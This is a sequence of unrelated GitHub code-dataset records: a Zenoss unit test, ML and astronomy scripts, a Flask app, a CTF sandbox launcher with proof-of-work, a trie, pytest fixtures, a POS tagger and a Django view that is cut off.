self.assertEqual(newPreMWProdState, 98)\n\n def testMoveDevicesRetainsComponentProductionState(self):\n self.dev._setProductionState(99)\n self.dev.setPreMWProductionState(98)\n self.dev.os.addIpInterface('eth0', True)\n component = self.dev.os.interfaces()[0]\n component._setProductionState(49)\n component.setPreMWProductionState(48)\n self.dmd.Devices.moveDevices('/Server', 'testdev')\n\n component = self.dmd.Devices.Server.devices.testdev.os.interfaces()[0]\n newProdState = component.getProductionState()\n newPreMWProdState = component.getPreMWProductionState()\n self.assertEqual(newProdState, 49)\n self.assertEqual(newPreMWProdState, 48)\n\n def testMoveDevicesRetainsComponentProductionStateAcquisition(self):\n self.dev._setProductionState(99)\n self.dev.os.addIpInterface('eth0', True)\n self.dmd.Devices.moveDevices('/Server', 'testdev')\n \n # Component production state is the same (acquired from device)\n component = self.dmd.Devices.Server.devices.testdev.os.interfaces()[0]\n newProdState = component.getProductionState()\n self.assertEqual(newProdState, 99)\n\n # Component production state still acquires from device\n self.dev._setProductionState(59)\n newProdState = component.getProductionState()\n self.assertEqual(newProdState, 59)\n\n def testMoveDevicesWithPotentialCaseIssue(self):\n 
self.dmd.Devices.createInstance( 'TESTDEV' )\n self.dmd.Devices.moveDevices('/Server', 'testdev')\n dev = self.dmd.Devices.Server.devices.testdev\n self.assert_(dev.os.interfaces)\n\n def testMoveDevicesStandardToCust(self):\n anna = self.dmd.Locations.createOrganizer(\"Annapolis\")\n group = self.dmd.Groups.createOrganizer(\"TestGroup\")\n self.dev.setLocation(\"/Annapolis\")\n self.dev.setGroups(\"/TestGroup\")\n self.dev.rackSlot = 15\n from Products.ZenModel.tests.CustDevice import CustDevice\n custdev = self.dmd.Devices.createOrganizer(\"/CustDev\")\n custdev._setProperty('zPythonClass',\n 'Products.ZenModel.tests.CustDevice')\n self.dmd.Devices.moveDevices('/CustDev', 'testdev') \n dev = self.dmd.Devices.findDevice('testdev')\n self.assertEqual(dev.getDeviceClassPath(), \"/CustDev\")\n self.assertEqual(dev.rackSlot, '15')\n self.assertEqual(dev.__class__, CustDevice)\n self.assertEqual(dev.location(), anna)\n self.assert_(dev in anna.devices())\n self.assert_(group in dev.groups())\n\n def testMoveDevicesCustToStandard(self):\n custdev = self.dmd.Devices.createOrganizer(\"/CustDev\")\n custdev._setProperty('zPythonClass',\n 'Products.ZenModel.tests.CustDevice')\n cdev = self.dmd.Devices.CustDev.createInstance('cdev')\n anna = self.dmd.Locations.createOrganizer(\"Annapolis\")\n group = self.dmd.Groups.createOrganizer(\"TestGroup\")\n cdev.setLocation(\"/Annapolis\")\n cdev.setGroups(\"/TestGroup\")\n cdev.rackSlot = 15\n self.dmd.Devices.moveDevices(\"/\", 'cdev')\n dev = self.dmd.Devices.findDevice('cdev')\n self.assertEqual(dev.getDeviceClassPath(), \"/\")\n self.assertEqual(dev.rackSlot, '15')\n self.assertEqual(dev.__class__, Device)\n self.assertEqual(dev.location(), anna)\n self.assert_(group in dev.groups())\n \n def testOrganizer(self):\n devices = self.dmd.Devices\n dc = devices.createOrganizer('/Test')\n self.assert_(dc in devices.children())\n self.assert_(dc in devices.getSubOrganizers())\n self.assertEqual(devices.countChildren(), 6)\n self.assert_('Test' in devices.childIds())\n self.assert_('/Test' in devices.getOrganizerNames())\n self.assertEqual(devices.getOrganizer('/Test'), dc)\n layer = devices.createOrganizer('/Layer')\n devices.moveOrganizer('Layer',['Test'])\n self.assert_('/Layer' in devices.getOrganizerNames())\n self.assert_(dc not in devices.children())\n self.assert_(dc in devices.getSubOrganizers())\n getFacade('device', self.dmd).deleteNode('/zport/dmd/Devices/Layer')\n self.assert_(layer not in devices.children())\n self.assert_(dc not in devices.getSubOrganizers())\n\n def testDeviceOrganizer(self):\n devices = self.dmd.Devices\n dc = devices.createOrganizer('/Test')\n self.assertEqual(devices.countDevices(), 3)\n self.assert_(self.dev in devices.getSubDevices())\n\n def test_devtypes(self):\n devices = self.dmd.Devices\n # Test registration\n devices.register_devtype('Device', 'SNMP')\n self.assertEqual(devices.devtypes, [('Device', 'SNMP')])\n # Test no duplicates\n devices.register_devtype('Device', 'SNMP')\n self.assertEqual(devices.devtypes, [('Device', 'SNMP')])\n # Test removal\n devices.unregister_devtype('Device', 'SNMP')\n self.assertEqual(devices.devtypes, [])\n \n\ndef test_suite():\n from unittest import TestSuite, makeSuite\n suite = TestSuite()\n suite.addTest(makeSuite(TestDeviceClass))\n return suite\n\nif __name__==\"__main__\":\n 
framework()\n","repo_name":"zenoss/zenoss-prodbin","sub_path":"Products/ZenModel/tests/testDeviceClass.py","file_name":"testDeviceClass.py","file_ext":"py","file_size_in_byte":11644,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"61"}
+{"seq_id":"16316288115","text":"import pickle\nfrom pathlib import Path\n\nimport torch\n\nimport Resources.training as r\nfrom Pipeline import torch_datagenerator as td\nfrom Pipeline.data_gather import get_filelist_within_folder_blacklisted\nfrom Pipeline.data_loader_dryspot import DataloaderDryspots\n\nif __name__ == \"__main__\":\n dlds = DataloaderDryspots(divide_by_100k=False)\n batch_size = 131072\n generator = td.LoopingDataGenerator(\n r.get_data_paths_base_0(),\n get_filelist_within_folder_blacklisted,\n dlds.get_sensor_bool_dryspot,\n num_validation_samples=131072,\n num_test_samples=1048576,\n batch_size=batch_size,\n split_load_path=r.datasets_dryspots,\n split_save_path=Path(),\n num_workers=75,\n looping_strategy=None\n )\n all_sensor_inputs = []\n for i, (inputs, _, _) in enumerate(generator):\n all_sensor_inputs.append(inputs)\n print(i)\n all_sensor_values = torch.cat(all_sensor_inputs, dim=0)\n _std = all_sensor_values.std(dim=0)\n _mean = all_sensor_values.mean(dim=0)\n print(\"Std\\n\", _std)\n print(\"Mean\\n\", _mean)\n pickle.dump((_mean, _std), open(\"mean_std_1140_pressure_sensors.p\", \"wb\"))\n","repo_name":"isse-augsburg/rtm-predictions","sub_path":"Utils/calculate_mean_and_std_on_training_set_pressuresensors.py","file_name":"calculate_mean_and_std_on_training_set_pressuresensors.py","file_ext":"py","file_size_in_byte":1180,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"}
+{"seq_id":"12275808587","text":"from flask import Flask\nfrom capitains_nautilus.flask_ext import FlaskNautilus\n\n\nfrom . import configurable\n\n\napp = Flask(\"app\")\n\n\nextension_nemo = configurable.nemo_class(\n base_url=\"\",\n resolver=configurable.resolver,\n templates={\n \"main\": configurable.templates_folder,\n \"additional\": configurable.templates_folder_additional\n },\n chunker={\n \"default\": configurable.chunker\n },\n transform=configurable.xslt_dict,\n static_folder=configurable.statics_folder\n)\nextension_nautilus = FlaskNautilus(\n prefix=\"/api\",\n resolver=configurable.resolver\n)\n\n\nextension_nautilus.init_app(app)\nextension_nemo.init_app(app)\n\nconfigurable.instantiate_errors(app, extension_nemo)\n","repo_name":"Capitains/nemo-template-app","sub_path":"nemo/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":716,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}
+{"seq_id":"13001417186","text":"#!/usr/bin/env python3\nfrom pathlib import Path\nimport secrets\nimport asyncio\nimport subprocess\n\nfrom starlette.applications import Starlette\nfrom starlette.responses import HTMLResponse\nfrom starlette.background import BackgroundTask\n\nimport config\nimport powser\n\nserver = Starlette(debug=config.debug)\npowser = powser.Powser(db_path='./pow/pow.sqlite3', difficulty=config.difficulty)\n\nasync def remove_sandbox(sandbox_name):\n await asyncio.sleep(config.recycle_t)\n subprocess.run(['sudo', '/usr/bin/remove_sandbox.sh', sandbox_name])\n\ndef create_sandbox(sandbox_name):\n subprocess.run(['sudo', '/usr/bin/create_sandbox.sh', sandbox_name])\n\n@server.route('/')\nasync def index(request):\n ip = request.headers['X-Real-IP']\n answer = request.query_params.get('answer')\n if answer is None:\n prefix, time_remain = powser.get_challenge(ip)\n return HTMLResponse(f'''\n{prefix} {powser.difficulty}\n\nsha256({prefix} + ???) == {'0'*powser.difficulty}({powser.difficulty})...\n\n\n\nWe will create an isolated sandbox for challengers to prevent you from being interfered by others.\n\nIP: {ip}\nTime remain: {time_remain} seonds\nYou need to await {time_remain - powser.min_refresh_time} seconds to get a new challenge.\n'''.replace('\\n', ' \\n'))\n res, msg = powser.verify_client(ip, str(answer), with_msg=True)\n if not res:\n return HTMLResponse(msg)\n sandbox_name = secrets.token_urlsafe(32)[:32].replace('-', '_') # useradd will parse '-nabc' ... -_-\n create_sandbox(sandbox_name)\n return HTMLResponse(f'''\nYour sandbox is available in /{sandbox_name}/ \nIt's will be automatically deleted after {config.recycle_t} seconds.\n''', background=BackgroundTask(remove_sandbox, sandbox_name))\n","repo_name":"BookGin/my-ctf-challenges","sub_path":"balsn-ctf-2019/images-and-words/docker/zeus/sandbox_main.py","file_name":"sandbox_main.py","file_ext":"py","file_size_in_byte":1871,"program_lang":"python","lang":"en","doc_type":"code","stars":35,"dataset":"github-code","pt":"61"}
+{"seq_id":"6501997966","text":"from sklearn.datasets import load_iris\nfrom sklearn.model_selection import train_test_split as tts\nfrom sklearn.svm import SVC\nfrom sklearn.metrics import confusion_matrix, accuracy_score\n\n\niris = load_iris()\nx, y = iris.data, iris.target\n\nx_train, x_test, y_train, y_test = tts(x, y, test_size=0.2)\n\nc = 1\ngamma = 'auto'\nkernel = 'linear'\n\nmodel = SVC(kernel=kernel, C=c, gamma=gamma)\nmodel.fit(x_train, y_train)\n\ny_pred = model.predict(x_test)\nprint(confusion_matrix(y_pred, y_test))\nprint(accuracy_score(y_pred, y_test))\n","repo_name":"Sapphire0912/Programming","sub_path":"Python/Project/heart recognize/my classifier/example_prac.py","file_name":"example_prac.py","file_ext":"py","file_size_in_byte":524,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"40966581869","text":"import os\nimport pytest\nimport tempfile\n\n# This import prevents SQLAlchemy from throwing an AttributeError\n# claiming that is already a registered type -- it is suspicious\n# code and should eventually be either confirmed to fix a bug, or removed\nfrom flask_sqlalchemy import SQLAlchemy\n\nfrom Choys.flaskr import create_app\n\npytest_plugins = ['pytester']\n\n\n@pytest.fixture\ndef db_testdir(conftest, testdir):\n \"\"\"Set up a temporary test directory loaded with the configuration file for\n the tests.\"\"\"\n testdir.makeconftest(conftest)\n\n return testdir\n\n\n@pytest.fixture(scope='module')\ndef conftest():\n \"\"\"Load configuration file for the tests to a string, in order to run it in\n its own temporary directory.\"\"\"\n with open(os.path.join('tests', '_conftest.py'), 'r') as conf:\n conftest = conf.read()\n\n return conftest\n\n\n@pytest.fixture(scope='session')\ndef app(request):\n \"\"\"Session-wide test `Flask` application.\"\"\"\n settings_override = {\n 'TESTING': True,\n 'SQLALCHEMY_DATABASE_URI': os.environ['TEST_DATABASE_URL']\n }\n\n app = create_app(settings_override)\n\n # Establish an application context before running the tests.\n ctx = app.app_context()\n ctx.push()\n\n def teardown():\n ctx.pop()\n\n request.addfinalizer(teardown)\n return app\n\n\n@pytest.fixture(scope='session')\ndef _db(app, request):\n \"\"\"Session-wide test database.\"\"\"\n def teardown():\n db.drop_all()\n\n db = SQLAlchemy(app=app)\n\n request.addfinalizer(teardown)\n return db\n\n\n@pytest.fixture(scope='function')\ndef session(db, request):\n \"\"\"Creates a new database session for a test.\"\"\"\n connection = db.engine.connect()\n transaction = connection.begin()\n\n options = dict(bind=connection, binds={})\n session = db.create_scoped_session(options=options)\n\n db.session = session\n\n def teardown():\n transaction.rollback()\n connection.close()\n session.remove()\n\n request.addfinalizer(teardown)\n return session\n\n\n@pytest.fixture\ndef client(app):\n db_fd, app.config['DATABASE'] = tempfile.mkstemp()\n app.config['TESTING'] = True\n\n with app.test_client() as client:\n yield client\n\n os.close(db_fd)\n os.unlink(app.config['DATABASE'])\n","repo_name":"bmaximuml/Choys","sub_path":"tests/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":2265,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}
+{"seq_id":"22793654787","text":"import numpy as np\nimport csv\nimport math as math\nfrom utilities import *\n#from scipy import interpolate\nimport requests\nfrom contextlib import closing\nfrom filterlist_to_filterfiles import *\nimport string\n\n'''\nsn_name is a string with the desired supernova name\ndesired_filter_list is an array of the filters which have data\nprogram writes two csv files\n--magarray.csv has the magnitudes and errors for the desired filters\n--countsarray.csv has the interpolated counts for all times at all filters\n'''\n\n\ndef observedmags_to_counts_2(sn_name, desired_filter_list, template_spectrum, interpFilter = \"UVW1\"):\n input_file = open('../input/'+ sn_name + '_osc.csv', 'r+')\n data = input_file.read()\n data = data.splitlines()\n data_list = []\n for line in data:\n data_list.append(line.split(','))\n\n time = []\n mag = []\n emag = []\n band = []\n \n for x, line in enumerate(data_list):\n if x != 0 and str(line[5]).upper() in desired_filter_list:\n # This checks if there is an uncertainty (error) given. \n # If not, skip it as the magnitude is an upper limit not a measurement\n if line[3] != '':\n time.append(float(line[1]))\n mag.append(float(line[2]))\n emag.append(float(line[3]))\n band.append((str(line[5])).upper())\n\n filter_file_list,zeropointlist,pivotlist = filterlist_to_filterfiles(desired_filter_list, template_spectrum)\n\n interpFirst = 1000000000000000\n interpLast = -1000000000000000\n for i in range(0, len(time)):\n if(band[i] == interpFilter and mag[i] > 0):\n if(time[i] < interpFirst):\n interpFirst = time[i]\n if(time[i] > interpLast):\n interpLast = time[i]\n\n interpTimes = []\n #for nonzero filters in interval of interpolation\n for i in range(0, len(time)):\n if interpFirst <= time[i] <= interpLast:\n if band[i] == interpFilter:\n interpTimes.append(time[i])\n\n #Adding the variables\n with open('../output/Test_A.csv', 'a', newline='') as file:\n writer = csv.writer(file)\n writer.writerow([2, \"Time\", time])\n writer.writerow([3, \"Mag\", mag])\n writer.writerow([4, \"Emag\", emag])\n writer.writerow([5, \"Band\", band])\n writer.writerow([6, \"Interptimes\", interpTimes])\n\n\n #contains counts directly from measured values\n counts_matrix = np.zeros((len(desired_filter_list),len(time)), dtype=object)\n counterrs_matrix = np.zeros((len(desired_filter_list),len(time)), dtype=object)\n #contains measured magnitudes\n magMatrix = np.zeros((len(desired_filter_list),len(time)), dtype=object)\n #contains measured error on magnitudes\n emagMatrix = np.zeros((len(desired_filter_list),len(time)), dtype=object)\n\n #contains interpolated count values for all filters over all times\n interp_counts_matrix = np.zeros((len(desired_filter_list),len(interpTimes)))\n interp_counterrs_matrix = np.zeros((len(desired_filter_list),len(interpTimes)))\n interpMatrix = np.zeros((len(desired_filter_list),len(interpTimes)))\n\n for i in range(len(desired_filter_list)):\n measured_counts = np.zeros(len(time))\n measured_counterrs = np.zeros(len(time))\n measured_times = np.zeros(len(time))\n length = 0\n\n###### does this have to be done in a for loop or can python operate on the whole row/column at once?\n\n for j in range(len(time)):\n\n if band[j] == desired_filter_list[i]:\n\n counts_matrix[i][j] = str(math.pow(10, -0.4*(mag[j]-zeropointlist[i]))) \n counterrs_matrix[i][j] = str(abs(float(counts_matrix[i][j])*float(emag[j])*-1.0857)) # need to check if this works\n\n magMatrix[i][j] = str(mag[j])\n emagMatrix[i][j] = emag[j]\n 
measured_counts[length] = float(counts_matrix[i][j])\n measured_counterrs[length] = float(counterrs_matrix[i][j])\n measured_times[length] = time[j]\n length += 1\n else:\n counts_matrix[i][j] = ''\n counterrs_matrix[i][j] = ''\n magMatrix[i][j] = ''\n emagMatrix[i][j] = ''\n measured_counts.resize(length)\n measured_counterrs.resize(length)\n measured_times.resize(length)\n interp_counts_matrix[i] = np.interp(interpTimes, measured_times, measured_counts)\n interp_counterrs_matrix[i] = np.interp(interpTimes, measured_times, measured_counterrs)\n\n column_err_names = []\n\n for l in range(len(desired_filter_list)):\n column_err_names.append(desired_filter_list[l]+'err')\n\n column_names = ['Time (MJD)']\n\n for l in range(len(desired_filter_list)):\n column_names.append(desired_filter_list[l])\n column_names.append(column_err_names[l])\n\n\n with open('../output/MAGS/'+ sn_name + '_magarray.csv', 'w', newline='') as csvFile:\n writer = csv.writer(csvFile, delimiter=',')\n writer.writerows([column_names])\n for i in range(0,len(interpTimes)):\n line = np.zeros(1+2*len(desired_filter_list),dtype=object)\n line[0] = str(interpTimes[i])\n for j in range(0,len(desired_filter_list)):\n line[2*j + 1] = magMatrix[j][i]\n line[2*j + 2] = emagMatrix[j][i]\n writer.writerow(line)\n\n\n with open('../input/COUNTS/'+ sn_name + '_countsarray.csv', 'w', newline ='') as csvFile:\n writer = csv.writer(csvFile, delimiter=',')\n writer.writerows([column_names])\n for i in range(0,len(interpTimes)):\n line = np.zeros(1+2*len(desired_filter_list))\n line[0] = interpTimes[i]\n for j in range(0,len(desired_filter_list)):\n line[2*j+1] = interp_counts_matrix[j][i]\n line[2*j+2] = interp_counterrs_matrix[j][i]\n writer.writerow(line)","repo_name":"pbrown801/aggienova-templates","sub_path":"python/observedmags_to_counts.py","file_name":"observedmags_to_counts.py","file_ext":"py","file_size_in_byte":5920,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"}
+{"seq_id":"3148388412","text":"t = int(input())\nfor _ in range(t):\n n = int(input())\n a = list(map(int, input().split()))\n a = a[::-1]\n for i in range(1, n):\n while a[i] > a[i-1]:\n a[i] = a[i]//2\n a = a[::-1]\n print(*a)","repo_name":"SongJungHyun1004/Coding_Test","sub_path":"02주차/타노스 정렬 1.py","file_name":"타노스 정렬 1.py","file_ext":"py","file_size_in_byte":224,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"1176502743","text":"#\n# @lc app=leetcode.cn id=208 lang=python3\n#\n# [208] 实现 Trie (前缀树)\n#\n\n# @lc code=start\n\nclass Node(object):\n green, black = 1, 0\n\n def __init__(self, val=None, color=0):\n self.val = val\n self.child = []\n self.child_val = ''\n self.color = color\n\n def insert(self, ch, color):\n '''\n 在当前节点插入一个字符. \n '''\n idx = self.child_val.find(ch)\n if idx == -1:\n self.child_val += ch\n self.child.append(Node(ch, color))\n return self.child[-1]\n else:\n if self.child[idx].color == Node.black:\n self.child[idx].color = color\n return self.child[idx]\n\n def search(self, word):\n node = self\n for ch in word:\n idx = node.child_val.find(ch)\n if idx != -1:\n node = node.child[idx]\n else:\n return False\n return node.color == Node.green\n \n def startsWith(self, word):\n node = self\n for ch in word:\n idx = node.child_val.find(ch)\n if idx == -1:\n return False\n else:\n node = node.child[idx]\n return True\n\nclass Trie:\n\n def __init__(self):\n \"\"\"\n Initialize your data structure here.\n \"\"\"\n self.root = Node()\n\n def insert(self, word: str) -> None:\n \"\"\"\n Inserts a word into the trie.\n \"\"\"\n n = len(word)\n node = self.root\n for i, ch in enumerate(word):\n if i == n-1:\n node.insert(ch, Node.green)\n else:\n node = node.insert(ch, Node.black)\n\n def search(self, word: str) -> bool:\n \"\"\"\n Returns if the word is in the trie.\n \"\"\"\n return self.root.search(word)\n\n def startsWith(self, prefix: str) -> bool:\n \"\"\"\n Returns if there is any word in the trie that starts with the given prefix.\n \"\"\"\n return self.root.startsWith(prefix)\n\n\n# if __name__ == '__main__':\n# trie = Trie()\n# trie.insert('apple')\n# print(trie.search('app')) # False\n# trie.insert('app')\n# print(trie.search('app')) # True\n# trie.insert('apps')\n# print(trie.search('app')) # True\n# print(trie.search('apple')) # True\n# print(trie.startsWith('ap')) # True\n# print(trie.startsWith('apP')) # False\n# trie.insert('apP')\n# print(trie.search('apP')) # True\n\n# Your Trie object will be instantiated and called as such:\n# obj = Trie()\n# obj.insert(word)\n# param_2 = obj.search(word)\n# param_3 = obj.startsWith(prefix)\n# @lc code=end\n","repo_name":"labusi/oj-problems","sub_path":"leetcode/python/208.实现-trie-前缀树.py","file_name":"208.实现-trie-前缀树.py","file_ext":"py","file_size_in_byte":2658,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}
+{"seq_id":"7154355182","text":"## general imports\nimport random\nimport itertools \nfrom pprint import pprint \nimport numpy as np\nimport pandas as pd \nfrom sklearn.model_selection import train_test_split # data splitter\nfrom sklearn.linear_model import LogisticRegression\nimport re\nimport copy as cp\n\n\n## project supplied imports\nfrom submission_specs.SubmissionSpec12 import SubmissionSpec12\n\nclass Submission(SubmissionSpec12):\n ''' a contrived poorely performing solution for question one of this Maman '''\n __TAG_IDX = 1\n __WORD_IDX = 0\n __START_TAG = \"\"\n __END_TAG = \"\"\n __NUM_OF_PATHS = 3\n __START_GRAM = (None, None)\n __END_GRAM = (None, None)\n __SPECIAL_FEATURES_NUM = 11\n\n def __init__(self):\n self._tag_set = np.array('ADJ ADP PUNCT ADV AUX SYM INTJ CCONJ X NOUN DET PROPN NUM VERB PART PRON SCONJ'.split())\n self._tag_to_num = {tag:idx for idx, tag in enumerate(self._tag_set)}\n self._lrm = LogisticRegression(multi_class='multinomial', solver='lbfgs', max_iter=1000)\n self._ngrams = set()\n self._N = len(self._tag_set)\n self._pis = np.zeros(self._N, dtype=np.float64)\n\n def _estimate_transition_probabilites(self, annotated_sentences):\n pass\n\n def _estimate_emission_probabilites(self, annotated_sentences):\n pass\n\n def _get_word_ngrams(self, min_ngram_len, max_ngram_len, token):\n '''\n a helper function we use to build all character ngrams upon initialization,\n in case we choose to use character ngrams as features\n '''\n\n word_ngrams = set()\n\n # per ngram length\n for n in range(min_ngram_len, max_ngram_len + 1):\n # sliding window iterate the token to extract its ngrams\n for idx in range(len(token) - n + 1):\n ngram = token[idx: idx + n]\n word_ngrams.add(ngram)\n\n return word_ngrams # return value used for test only\n\n def _calc_pis(self, grams):\n start_grams = dict()\n for k, v in grams.items():\n if k[0] == self.__START_GRAM:\n work_gram = (None, k[1][1])\n if work_gram not in start_grams:\n start_grams[work_gram] = v\n else:\n start_grams[work_gram] += v\n\n for idx in range(self._N):\n tag = self._tag_set[idx]\n gram = (None, self._tag_set[idx])\n if gram in start_grams:\n self._pis[idx] = start_grams[gram] / self._tag_count[tag]\n\n def _get_vocabulary(self, sentences):\n '''\n calculates all needed initial parts , trigrams, number of words set of words\n counts tags and pis\n :param sentences: sentences to inspect\n :return: vocabulary\n '''\n V = set()\n self._tri_grams = dict()\n\n self._total_ngrams = 0\n self.total_words = 0\n self._tag_count = dict()\n for sentence in sentences:\n for idx, token in enumerate(sentence):\n gram = self._create_trigram(sentence, idx)\n V.add(token[self.__WORD_IDX])\n if gram in self._tri_grams.keys():\n self._tri_grams[gram] += 1\n else:\n self._tri_grams[gram] = 1\n if token[self.__TAG_IDX] in self._tag_count.keys():\n self._tag_count[token[self.__TAG_IDX]] += 1\n else:\n self._tag_count[token[self.__TAG_IDX]] = 1\n self._total_ngrams += 1\n self.total_words += 1\n\n self._calc_pis(self._tri_grams)\n\n self._word_count = len(V)\n self._trigram_count = len(self._tri_grams)\n return V\n\n def _create_ngrams_list(self, sentences, min_ngram=1, max_ngram=2):\n V = self._get_vocabulary(sentences)\n for t in V:\n self._ngrams |= self._get_word_ngrams(min_ngram, max_ngram, t)\n\n def _create_vectors(self, sentences):\n #TODO: check if we can train on one ngram at a time or we need to multiply the ngrams\n y = np.zeros(self._total_ngrams)\n #X = np.zeros(self._total_ngrams, dtype=list)\n X = [0] * 
self._total_ngrams\n '''y = np.zeros(len(self._tri_grams))\n X = [0] * len(self._tri_grams)'''\n\n #location in vect\n loc = 0\n for gram, times in self._tri_grams.items():\n fv = self._vectorize(gram)\n c = self._tag_to_num[gram[1][1]]\n\n y[loc:loc+times] = c\n\n for t in range(times):\n X[loc+t] = fv\n\n loc += times\n\n '''y[loc] = c\n X[loc] = fv\n loc += 1'''\n\n assert len(y) == len(X)\n\n return X, y\n\n def _word_vectorize(self, word, tag, vect, start=0, main_word=False):\n '''size of the vector is size of ngrams * 3 + is all upper + starts with capital\n + has numbers and dash + has a number + special letter + word shape capitals to regulars, num of capitals,\n num of regulars, num of punct, num of numbers and N for number of states'''\n offset = start\n offest_count = 2\n\n if main_word:\n #check if word contains starts with or ends with one of the ngrams\n for ngram in self._ngrams:\n '''if ngram in word:\n vect[offset] = 1'''\n if word.startswith(ngram):\n vect[offset] = 1\n if word.endswith(ngram):\n vect[offset + 1] = 1\n offset += offest_count\n\n\n caps = re.findall(r\"[A-Z]\", word)\n nums = re.findall(r\"[0-9]\", word)\n lower = re.findall(r\"[a-z]\", word)\n punct = re.findall(r\"[.?\\-,\\\"]+\", word)\n\n #is all upper\n if not re.findall(r\"^[A-Z]+$\", word):\n vect[offset] = 1\n offset += 1\n\n #starts with capital\n if re.findall(r\"^[A-Z][A-Za-z0-9]+$\", word):\n vect[offset] = 1\n offset += 1\n\n #has only capitals dash and numbers\n if re.findall(r\"^[A-Z]+-[0-9]+\", word):\n vect[offset] = 1\n offset += 1\n\n #contains a number\n if re.findall(r\"[0-9]\", word):\n vect[offset] = 1\n offset += 1\n\n if 'ing' in word:\n vect[offset] = 1\n offset += 1\n\n tmpWord = word.lower()\n if 'a' in tmpWord or 'e' in tmpWord or 'u' in tmpWord or 'o' in tmpWord or 'i' in tmpWord:\n vect[offset] = 1\n offset += 1\n\n if 'ing' in tmpWord:\n vect[offset] = 1\n offset += 1\n\n vect[offset] = len(caps)\n vect[offset + 1] = len(lower)\n vect[offset + 2] = len(nums)\n vect[offset + 3] = len(punct)\n\n vect[offset + 4 + self._tag_to_num[tag]] = 1\n\n return vect\n\n def _create_trigram(self, sentence, idx, states=None):\n gram = [self.__START_GRAM, self.__START_GRAM, self.__END_GRAM]\n\n def assign_grams(gid, id):\n if not states:\n grm = (sentence[id][self.__WORD_IDX], sentence[id][self.__TAG_IDX])\n else:\n grm = (sentence[id], self._tag_set[states[gid]])\n gram[gid] = tuple(grm)\n\n assign_grams(1, idx)\n\n if idx > 0:\n assign_grams(0, idx - 1)\n\n if idx < len(sentence) - 1:\n assign_grams(2, idx + 1)\n\n return tuple(gram)\n\n def _vectorize(self, gram):\n # the size of the vector is fv_len and two words between it\n vector = np.zeros(self._fv_size + 2*self._fv_size_no_ngrams)\n\n self._word_vectorize(gram[1][self.__WORD_IDX], gram[1][self.__TAG_IDX], vector, 0, True)\n\n if gram[0] != self.__START_GRAM:\n self._word_vectorize(gram[0][self.__WORD_IDX], gram[0][self.__TAG_IDX], vector, self._fv_size)\n\n if gram[2] != self.__END_GRAM:\n self._word_vectorize(gram[2][self.__WORD_IDX], gram[2][self.__TAG_IDX], vector, self._fv_size+self._fv_size_no_ngrams)\n\n # our feature vector\n return vector\n\n def _get_lrm_prediction(self, sentence, idx, states=None):\n gram = self._create_trigram(sentence, idx, states)\n X = self._vectorize(gram).reshape(1, -1)\n z = self._lrm.classes_\n Cp = [0] * self._N\n for probList in self._lrm.predict_proba(X):\n for idx, prob in enumerate(probList):\n Cp[int(z[idx])] = prob\n return Cp\n\n #\n # return self._lrm.predict_proba(X)\n\n def 
_viterbi(self, sentence):\n if sentence is None:\n return\n N = self._N\n T = len(sentence)\n viterbi_mat = np.zeros((N, T))\n backpointer = np.full((N, T), -1)\n #init the lettece matrix\n for s in range(N):\n pred = self._get_lrm_prediction(sentence, 0, [None, s, s+1])\n viterbi_mat[s, 0] = pred[s]*self._pis[s]\n\n for t in range(1, T):\n for s_i in range(N):\n pred = np.zeros(N)\n for s_j in range(N):\n pred[s_j] = self._get_lrm_prediction(sentence, t, [s_i, s_j, s_i+1])[s_j]\n vitmax = pred * viterbi_mat[:, t-1]\n viterbi_mat[s_i, t] = np.max(vitmax)\n backpointer[s_i, t] = np.argmax(vitmax)\n\n best_path_probe = np.max(viterbi_mat[:, T - 1])\n best_back_pointer = int(np.argmax(viterbi_mat[:, T - 1]))\n\n best_path = list() # [self._tag_set[int(best_back_pointer)]]\n best_path.append(self._tag_set[best_back_pointer])\n for t in reversed(range(0, T - 1)):\n next_tag = int(backpointer[np.argmax(viterbi_mat[:, t + 1]), t + 1])\n best_path.append(self._tag_set[next_tag])\n\n return best_path[::-1], best_path_probe\n\n def train(self, annotated_sentences):\n ''' trains the HMM model (computes the probability distributions) '''\n self._create_ngrams_list(annotated_sentences)\n self._fv_size = len(self._ngrams) * 2 + self.__SPECIAL_FEATURES_NUM + len(self._tag_set) # size of the feature vector\n self._fv_size_no_ngrams = self.__SPECIAL_FEATURES_NUM + len(self._tag_set)\n X, y = self._create_vectors(annotated_sentences)\n self._lrm.fit(X, y)\n return self\n\n def predict(self, sentence):\n prediction, _ = self._viterbi(sentence)\n return prediction\n","repo_name":"calebxyz/ONLP-12","sub_path":"test other/solution12.py","file_name":"solution12.py","file_ext":"py","file_size_in_byte":10303,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"10685198071","text":"from django.shortcuts import render, redirect, get_object_or_404, HttpResponse\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\nfrom django.db.models.functions import ExtractMonth\nfrom django.db.models import Count, Sum\nfrom pyecharts import options as opts\nfrom pyecharts.charts import Page, Bar, Pie\nfrom .models import Order\nfrom stock.models import Stock\nfrom .forms import EditForm\n\n\ndef index(request):\n page = request.GET.get('page') # 当前页码, 缺少时为第1页\n results = Order.objects.all()\n paginator = Paginator(results, 10)\n try:\n current_page = paginator.page(page)\n data_list = current_page.object_list\n except PageNotAnInteger:\n current_page = paginator.page(1)\n data_list = current_page.object_list\n except EmptyPage:\n current_page = paginator.page(paginator.num_pages)\n data_list = current_page.object_list\n return render(request, 'order/index.html', locals()) # 模板文件路径没有提示, 不检查路径\n\n\ndef create(request):\n if request.method == 'POST':\n form = EditForm(request.POST)\n if form.is_valid():\n cd = form.cleaned_data\n stock = cd['stock'] # 当前选中的库存商品\n quantity = cd['quantity'] # 当前订购的数量\n\n # 剩余商品数量\n remaining = stock.unit_in_stock - stock.unit_on_order\n # 如果库存剩余商品数量 大于等于 